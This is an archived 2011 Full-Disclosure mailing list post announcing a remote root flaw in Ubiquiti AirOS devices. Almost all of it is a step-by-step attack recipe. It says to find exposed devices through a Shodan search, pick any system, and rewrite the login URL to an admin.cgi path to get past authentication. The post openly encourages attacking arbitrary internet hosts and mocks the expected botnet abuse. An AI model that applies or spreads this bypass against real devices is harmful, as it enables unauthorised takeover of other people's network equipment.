lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <CAE6fNr+0K-kD8mxRjAhsL5pN_a6Dt2H2AWgD8x4uqEn7JGBBNg@mail.gmail.com> Date: Mon, 19 Dec 2011 18:38:25 +0100 From: sd <sd@...ksheep.org> To: full-disclosure@...ts.grok.org.uk Subject: AirOS remote root 0day since some genius decided to write worm for this, here is early santa for you, kids: 1. http://www.shodanhq.com/search?q=airos 2. click arbitrary system 3. change http://X.X.X.X/login.cgi?uri=/ to http://X.X.X.X/admin.cgi/sd.css 4. profit? IRCNet opers: expect some decent KNB bot mayhem for a while :) _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/